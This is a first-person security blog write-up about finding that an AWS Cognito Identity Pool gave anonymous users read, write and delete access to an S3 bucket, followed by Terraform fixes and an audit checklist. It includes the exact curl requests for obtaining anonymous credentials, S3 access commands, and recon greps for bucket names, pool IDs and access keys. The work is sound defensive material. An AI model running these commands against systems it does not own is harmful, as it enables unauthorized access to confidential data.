How Two curl Commands Gave Me Full Access to an S3 Bucket
A routine API pentest revealed that AWS Cognito Identity Pools were handing out S3 credentials to anyone on the internet. Here is how I found it, what I got wrong along the way, and the step-by-step fix.
I wasn’t looking for this. I was halfway through a routine pentest on a payment form — checking for XSS, poking at validation — when I stumbled into something much worse. Two curl commands later, I was staring at 2.4 GB of confidential files in an S3 bucket. No login. No password. No API key.
This is a write-up from that test. The project names and bucket identifiers have been changed, but the commands, the responses, and — importantly — the mistakes are all real.
If your frontend uploads files to S3 using Cognito Identity Pools, you might want to sit down for this one.
A Little Background
I’m a DevOps engineer. Infrastructure, CI/CD pipelines, Terraform — that’s been my world. But lately I’ve been moving into DevSecOps because in a world where AI can generate exploit scripts in seconds, someone on the team needs to be thinking about security full-time.
So I started pentesting our own APIs. Not with Burp Suite or some enterprise scanner — just curl, a terminal, and the kind of paranoia you develop after reading too many breach reports at 2 AM.
The Discovery
I was testing a public form that accepts payments. Standard stuff — check if the email field validates properly, try some XSS payloads, see if I can manipulate prices. During this, I opened the browser dev tools to watch network requests, and I noticed something interesting.
The frontend wasn’t uploading files through the API. It was uploading them directly to S3. And to do that, it was getting temporary AWS credentials from somewhere.
I dug into the frontend JavaScript and found this:
1
2
3
4
5
6
import { fromCognitoIdentityPool } from '@aws-sdk/credential-provider-cognito-identity'
const credentials = fromCognitoIdentityPool({
client: cognitoClient,
identityPoolId: 'us-east-1:xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx',
})
A Cognito Identity Pool ID. Hardcoded in the frontend. Visible to literally anyone who right-clicks and says “View Source.”
Now, that’s not a vulnerability by itself — Cognito Identity Pools are designed to work from the frontend. But it made me curious. The kind of curious that leads to either a boring “it’s fine” or a very interesting Slack message to the team. The question was: what permissions does the anonymous role have?
Two curl Commands to Full Access
Here’s the thing about Cognito Identity Pools that keeps security folks up at night. If allow_unauthenticated_identities is set to true (and it is more often than you’d think), anyone can get temporary AWS credentials. No account needed. No login. Nothing. Just ask nicely.
Step 1 — Get an anonymous identity:
1
2
3
4
curl -s -X POST "https://cognito-identity.us-east-1.amazonaws.com/" \
-H "Content-Type: application/x-amz-json-1.1" \
-H "X-Amz-Target: AWSCognitoIdentityService.GetId" \
-d '{"IdentityPoolId":"us-east-1:xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"}'
Response:
1
{"IdentityId":"us-east-1:yyyyyyyy-yyyy-yyyy-yyyy-yyyyyyyyyyyy"}
AWS just gave me an identity. I didn’t prove who I am. I didn’t even say my name.
Step 2 — Exchange that identity for real AWS credentials:
1
2
3
4
curl -s -X POST "https://cognito-identity.us-east-1.amazonaws.com/" \
-H "Content-Type: application/x-amz-json-1.1" \
-H "X-Amz-Target: AWSCognitoIdentityService.GetCredentialsForIdentity" \
-d '{"IdentityId":"us-east-1:yyyyyyyy-yyyy-yyyy-yyyy-yyyyyyyyyyyy"}'
Response:
1
2
3
4
5
6
7
8
{
"Credentials": {
"AccessKeyId": "ASIAXXXXXXXXXXX",
"SecretKey": "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx",
"SessionToken": "very-long-token-here...",
"Expiration": 1776675435.0
}
}
That’s it. Real, working AWS credentials. I exported them and ran:
1
2
3
4
5
6
export AWS_ACCESS_KEY_ID="ASIAXXXXXXXXXXX"
export AWS_SECRET_ACCESS_KEY="xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
export AWS_SESSION_TOKEN="very-long-token-here..."
export AWS_DEFAULT_REGION=us-east-1
aws s3 ls s3://my-app-uploads-bucket/
And I saw everything:
1
2
3
4
5
6
PRE submissions/
PRE documents/
PRE press/
PRE events/
PRE signatures/
PRE media/
150 files. 2.4 GB. Confidential submissions, signed documents, internal materials. All accessible without logging in.
My coffee went cold. I forgot about the XSS test I was running.
It Wasn’t Just Read Access
At this point I was hoping the damage was limited to reading. Spoiler: it wasn’t.
I tested write access:
1
echo "pentest" | aws s3 cp - s3://my-app-uploads-bucket/pentest-proof.txt
It worked. I could upload arbitrary files. I immediately deleted my test file.
Then I tested delete:
1
aws s3 rm s3://my-app-uploads-bucket/pentest-proof.txt
Also worked.
Let that sink in for a moment. Anyone on the internet — no account, no login, no API key — could download every confidential file, upload malware that admins would open, or just nuke the entire bucket. Two curl commands. A rainy Tuesday afternoon. That’s all it would take.
The Accidental Discovery: You Don’t Even Need Cognito
Here’s the part I wasn’t expecting. While digging into the bucket configurations, I discovered something that made the Cognito issue almost irrelevant for the frontend buckets.
I tried this — no AWS credentials at all, just plain curl:
1
curl -s "https://my-app-frontend.s3.amazonaws.com/?list-type=2&max-keys=5"
And got back:
1
2
3
4
5
6
7
8
9
10
11
12
<ListBucketResult>
<Name>my-app-frontend</Name>
<Contents>
<Key>_nuxt/app-chunk-abc123.js</Key>
<Size>124532</Size>
<LastModified>2026-04-17T09:52:54.000Z</LastModified>
</Contents>
<Contents>
<Key>_nuxt/vendor-chunk-def456.js</Key>
...
</Contents>
</ListBucketResult>
Wait. That’s a full directory listing. Every file name, every file size, every last-modified timestamp. No credentials. No Cognito. No nothing. Just an HTTP GET to the S3 URL with ?list-type=2.
How? The bucket had acl = "public-read", which grants the s3:ListBucket permission to the AllUsers group — literally everyone on the internet. The bucket was behaving like an open FTP server from 1998.
I checked the other public buckets. Same thing. Six buckets total — three in production, three in staging — all happily serving directory listings to anyone who asked.
Why This Is Worse Than It Sounds
An attacker doesn’t need to guess file names. They can just ask the bucket for a complete inventory. But it gets worse.
Search engines index these listings. Google, Bing, and specialized tools like GrayhatWarfare actively crawl and index open S3 buckets. GrayhatWarfare maintains a searchable database of publicly accessible S3 buckets — you can search by filename, keyword, or file extension. If your bucket is publicly listable, there’s a good chance it’s already been indexed and catalogued.
In 2025, researchers confirmed that nearly half of all AWS S3 buckets were potentially misconfigured, with many publicly accessible due to default settings. More than half of analyzed buckets contained sensitive or personally identifiable information.
Tools like S3Scanner, Slurp, and bucket-finder automate the discovery of open buckets by trying common naming patterns. If your company is called “acme-corp,” they’ll try acme-corp, acme-corp-staging, acme-corp-uploads, acme-corp-backups — and when they find one that responds with ListBucketResult instead of AccessDenied, they know they’ve hit gold.
The Fix: DenyPublicListBucket
The fix was straightforward. Add a deny statement to all six bucket policies that blocks listing for anyone outside our AWS account:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
{
Sid = "DenyPublicListBucket"
Effect = "Deny"
Principal = "*"
Action = [
"s3:ListBucket",
"s3:ListBucketVersions",
"s3:ListBucketMultipartUploads"
]
Resource = aws_s3_bucket.my_bucket.arn
Condition = {
StringNotEquals = {
"aws:PrincipalAccount" = data.aws_caller_identity.current.account_id
}
}
}
The aws:PrincipalAccount condition is the key. It says: “deny listing for everyone except principals from our own AWS account.” CloudFront, CodeBuild, and internal services still work. Random people on the internet and search engine crawlers get AccessDenied.
I applied this to all six buckets — three production, three staging — in one PR. After deploying:
1
2
3
4
5
6
7
# Before: full directory listing
curl -s "https://my-app-frontend.s3.amazonaws.com/?list-type=2"
# <ListBucketResult>...<Key>index.html</Key>...440 objects...</ListBucketResult>
# After: access denied
curl -s "https://my-app-frontend.s3.amazonaws.com/?list-type=2"
# <Error><Code>AccessDenied</Code><Message>Access Denied</Message></Error>
Note that individual files are still accessible if you know the exact URL (the bucket is still public-read for GetObject). But you can no longer enumerate the contents. An attacker would have to guess exact file names instead of getting a free inventory.
Add this to your checklist: run curl -s "https://YOUR-BUCKET.s3.amazonaws.com/?list-type=2" against every public bucket you own. If you get XML back instead of AccessDenied, your file inventory is public.
How I Found the Bucket Names
OK so I had one bucket. But the paranoia had kicked in fully now. What else could these credentials reach? First problem: how do you find bucket names?
Turns out, they were practically waving at me from multiple places.
The frontend JavaScript told me.
The browser needs the bucket name to upload via the AWS SDK, so it’s baked into the production JavaScript bundle. You don’t need to dig through minified code — just grep for AWS-specific patterns:
1
2
3
4
5
6
7
8
9
10
11
# S3 bucket URLs
curl -s "https://my-app.example.com/" | grep -oE "[a-z0-9.-]+\.s3[a-z0-9.-]*\.amazonaws\.com"
# Cognito Identity Pool IDs
curl -s "https://my-app.example.com/" | grep -oE "us-east-1:[a-f0-9-]{36}"
# Any AWS endpoint
curl -s "https://my-app.example.com/" | grep -oE "[a-z0-9-]+\.amazonaws\.com"
# Hardcoded AWS access keys (you'd be surprised)
curl -s "https://my-app.example.com/" | grep -oE "AKIA[A-Z0-9]{16}"
The Cognito Identity Pool ID and the bucket name both showed up.
CloudFront error pages leaked the S3 origin.
1
curl -sI "https://my-app.example.com/nonexistent-12345" | grep -iE "x-amz|server.*amazon|x-cache"
Response: server: AmazonS3 and x-amz-error-code: NoSuchKey. That confirms S3 is behind CloudFront, and the bucket naming convention becomes guessable.
The S3 REST API confirmed bucket existence.
1
curl -sI "https://my-app-frontend-staging.s3.amazonaws.com/"
AWS returned x-amz-bucket-arn: arn:aws:s3:::my-app-frontend-staging. Thanks, AWS. Very helpful. No credentials needed — just ask and they’ll tell you the full ARN of the bucket.
The S3 website endpoint was directly accessible.
1
2
curl -sI "http://my-app-frontend-staging.s3-website-us-east-1.amazonaws.com/"
# HTTP/1.1 200 OK — the full website, bypassing CloudFront entirely
The Frontend Bucket — Where I Embarrassed Myself
This is the part of the story where I look a bit silly. But I’m including it because if I made this mistake, others will too.
With the frontend bucket name confirmed, I tested it with Cognito credentials:
1
aws s3 ls s3://my-app-frontend-bucket/
1
2
3
4
PRE _nuxt/
PRE admin/
PRE login/
index.html
440 files. The entire website. I could list and download everything.
Then I tested write access:
1
2
3
echo "test" | aws s3 cp - s3://my-app-frontend-bucket/test.txt
# AccessDenied: not authorized to perform s3:PutObject
# because no identity-based policy allows the s3:PutObject action
Denied. Wait, what? I initially assumed I could write to it — same account, same credentials, public bucket, all the vibes of “this should work.” But AWS IAM had other plans.
Here’s what I learned: AWS requires both the IAM policy (on the role) and the bucket policy (on the bucket) to allow an action. The Cognito IAM policy only grants PutObject on the uploads bucket. It doesn’t mention the frontend bucket at all. The bucket policy says “anyone can read” (Principal: *, GetObject), but that doesn’t mean “anyone can write.”
Here’s where it gets embarrassing. I had already written in my report — with great confidence and dramatic formatting — that the frontend bucket was fully writable. “Website defacement risk. CRITICAL.” I had used the --dryrun flag to “confirm” it. Sent the report. Felt like a security hero.
Then I went back to verify with actual commands. AccessDenied.
The --dryrun flag checks client-side logic. It does not actually talk to AWS IAM. It’s like checking if a door looks locked from across the street and writing “confirmed: door is locked” in your report. Go turn the handle.
To make things worse, I then spent an hour adding explicit deny statements to the frontend bucket policy. Tested them. Felt good about the “defense-in-depth.” Then realized the deny statements were doing nothing — IAM was already blocking the action without them. I had built a fence next to a wall.
Don’t add security controls for problems that don’t exist. It just adds complexity and makes the next person think there’s a vulnerability where there isn’t one.
The real damage was the uploads bucket — that one had full read/write/delete, confirmed with actual operations.
“But We Have CloudFront!”
Yeah, about that. Here’s something people get wrong: CloudFront is not a security boundary unless you configure it to be one.
In this case, CloudFront was set up as a “custom origin” — it accessed S3 via the website endpoint over HTTP, the same way any browser does. The bucket had Principal: * in its policy. CloudFront was just a CDN in front of a public bucket.
For CloudFront to actually protect S3:
- Use an S3 origin (not a custom/website origin)
- Enable Origin Access Control (OAC) — CloudFront signs requests with SigV4
- Remove
Principal: *from the bucket policy - Block public access on the bucket
Without all four, the bucket is publicly readable. The good news: AWS IAM still blocked writes from Cognito. But anyone who knows the bucket name can read everything.
The Root Cause (It’s One Line)
Brace yourself. The entire vulnerability came down to one line in a Terraform file:
1
2
3
4
resource "aws_cognito_identity_pool" "my_identity_pool" {
identity_pool_name = "my identity pool"
allow_unauthenticated_identities = true # <-- This right here
}
That single line says: “give AWS credentials to anyone who asks, even if they haven’t logged in.”
And the IAM role attached to unauthenticated users had:
1
2
3
4
5
6
7
actions = [
"s3:PutObject", # Upload anything
"s3:GetObject", # Download anything
"s3:DeleteObject", # Delete anything
"s3:ListBucket", # List everything
]
resources = ["arn:aws:s3:::my-app-uploads-bucket/*"]
The developer set this up so the frontend could upload files directly to S3 — a perfectly reasonable pattern, used by thousands of apps. But the anonymous role got the same permissions as an authenticated user. And nobody ever reviewed it.
The Terraform code had been there for over a year. Sitting in version control. Passing CI. Deploying to production. Working perfectly. And completely exploitable the entire time.
How I Fixed It (Without Breaking Anything)
When you find something like this, the temptation is to go full panic mode and change everything at once. Don’t. I’ve seen “emergency security fixes” that took down production because someone didn’t think through the blast radius.
Instead, I broke it into phases. Each one was a separate PR that could be deployed and rolled back independently.
Phase 0: Stop the bleeding (30 minutes, one coffee)
The fastest fix that makes the biggest difference. Remove GetObject and DeleteObject from the Cognito guest role:
1
2
3
4
5
actions = [
"s3:PutObject",
"s3:AbortMultipartUpload",
"s3:ListMultipartUploadParts",
]
Anonymous download and deletion stopped immediately. Uploads still work — the frontend needs them.
Phase 1: Scope uploads per user (1 hour)
Each Cognito identity gets a unique ID. Use it to restrict uploads to a per-user prefix:
1
2
3
resources = [
"arn:aws:s3:::my-app-uploads-bucket/uploads/${cognito-identity.amazonaws.com:sub}/*"
]
Now user A can only upload to uploads/user-a-id/ and user B to uploads/user-b-id/. No cross-user access.
The frontend needs a one-line change:
1
const key = `uploads/${credentials.identityId}/submissions/${filename}`;
Phase 2: The real fix — presigned URLs
The long-term solution is to stop sending AWS credentials to the browser entirely. Instead, the backend generates short-lived presigned URLs:
1
2
3
4
Browser → POST /api/upload/request (with JWT auth)
Backend → Validates user, file type, file size
Backend → Generates presigned PUT URL (expires in 15 minutes)
Browser → PUT directly to S3 using the presigned URL
The backend controls everything. The browser never sees an AWS access key. After this migration, set allow_unauthenticated_identities = false and the original vulnerability becomes literally impossible. No more two-curl-command nightmares.
The Part That Kept Me Up at Night
I fixed the vulnerability in about 30 minutes. The part that wouldn’t leave my head was how long it had been there.
Over a year. The Terraform code. The Identity Pool ID in the frontend JavaScript. Sitting there in plain sight. Nobody noticed because:
- It worked. Files uploaded correctly. The frontend team was happy.
- Security reviews focused on the API. Nobody checked the AWS IAM policies.
- Cognito is confusing. Even experienced AWS engineers mix up User Pools and Identity Pools.
- The bucket wasn’t “public.”
block_public_accesswas set on the uploads bucket. But Cognito credentials aren’t “public” — they’re authenticated AWS credentials that happen to be available to everyone.
This is the gap that DevSecOps fills. The developers wrote correct application code. The infrastructure team deployed it correctly. But nobody looked at the intersection — the IAM policy that connected the two.
What I Learned
1. “It’s just for uploads” is the most dangerous sentence in cloud security.
Every time someone says this at a standup, somewhere a Cognito Identity Pool gets s3:* permissions and nobody audits it for a year.
2. Cognito Identity Pools are powerful but easy to misconfigure.
allow_unauthenticated_identities = true means “hand out AWS credentials to anyone on the internet.” If you need this, scope the permissions to upload-only, to a specific prefix, with content-type restrictions.
3. Test your own infrastructure with curl.
I didn’t use any fancy pentesting tools. Just curl and the AWS CLI. Total cost: $0. Time to find a critical vulnerability: about 20 minutes. If I can get credentials with two HTTP requests, so can a bored teenager on a Saturday night.
4. Understand how AWS evaluates permissions.
AWS requires both the IAM policy (on the role) AND the bucket policy (on the bucket) to allow an action. If the IAM policy doesn’t mention a bucket, writes are blocked — even if the bucket is public. Don’t add deny statements where IAM already denies the action. It adds complexity without adding security.
5. Never trust --dryrun for security testing.
I cannot stress this enough. The --dryrun flag checks client-side logic. It does not talk to IAM. I used it to “confirm” a CRITICAL vulnerability that turned out to be a false positive. I wrote it up. I sent it to the team. Then I tested for real and had to sheepishly correct my own report. Turn the handle. Don’t just look at the door.
6. The fix doesn’t have to be perfect on day one.
I deployed Phase 0 in 30 minutes. That immediately stopped the worst-case scenario. The full fix (presigned URLs) took a week. Incremental security is real security.
Your Turn
Seriously, do this right now. Open a terminal. If your frontend uploads files to S3 using Cognito, run through this checklist:
- Is
allow_unauthenticated_identitiesset totrue? Do you actually need it? - Does the guest IAM role have
GetObjectorDeleteObject? Remove them. - Is
ListBucketscoped to a prefix, or can guests list the entire bucket? - Is
PutObjectscoped to a per-identity prefix using${cognito-identity.amazonaws.com:sub}? - Does the Cognito IAM policy mention your frontend bucket? It shouldn’t — if the IAM policy doesn’t mention a bucket, AWS blocks writes automatically.
- Can you discover your own bucket names from the frontend?
1
2
3
curl -s "https://your-site.com/" | grep -oE "[a-z0-9.-]+\.s3[a-z0-9.-]*\.amazonaws\.com"
curl -s "https://your-site.com/" | grep -oE "us-east-1:[a-f0-9-]{36}"
curl -sI "https://your-site.com/nonexistent" | grep -iE "x-amz|server.*amazon"
If any of those return results, an attacker already knows your bucket names and Cognito pool IDs. They probably found them before you did.
- Are your public buckets listing their contents? Test every public bucket:
1
curl -s "https://YOUR-BUCKET.s3.amazonaws.com/?list-type=2" | head -20
If you get <ListBucketResult> instead of AccessDenied, anyone on the internet (and search engines like GrayhatWarfare) can enumerate every file you have.
- Do you have CloudTrail data events enabled for S3 object operations?
- Do you have a CloudWatch alarm for excessive Cognito credential issuance?
The DevOps to DevSecOps Shift
This whole experience is why I’m moving from DevOps to DevSecOps. Not because it’s trending. Not because it looks good on LinkedIn. Because I looked at a Terraform file that had been in production for a year and realized nobody had ever asked “what can an anonymous user actually do with this?”
In the age of AI, the attack surface is expanding faster than any team can manually review. An AI can scan your frontend JavaScript, extract the Cognito Identity Pool ID, and test every permission in seconds. The window between “vulnerability introduced” and “vulnerability exploited” is shrinking to hours.
The infrastructure that “just works” might also “just expose everything.” Someone on every team needs to be the person who asks “what happens if I call this without logging in?” and then actually tries it.
That person is increasingly me. And honestly? I’ve never enjoyed my job more. There’s something deeply satisfying about breaking into your own systems, fixing the hole, and knowing you found it before someone else did.
Now go run those grep commands against your own site. I’ll wait.
References: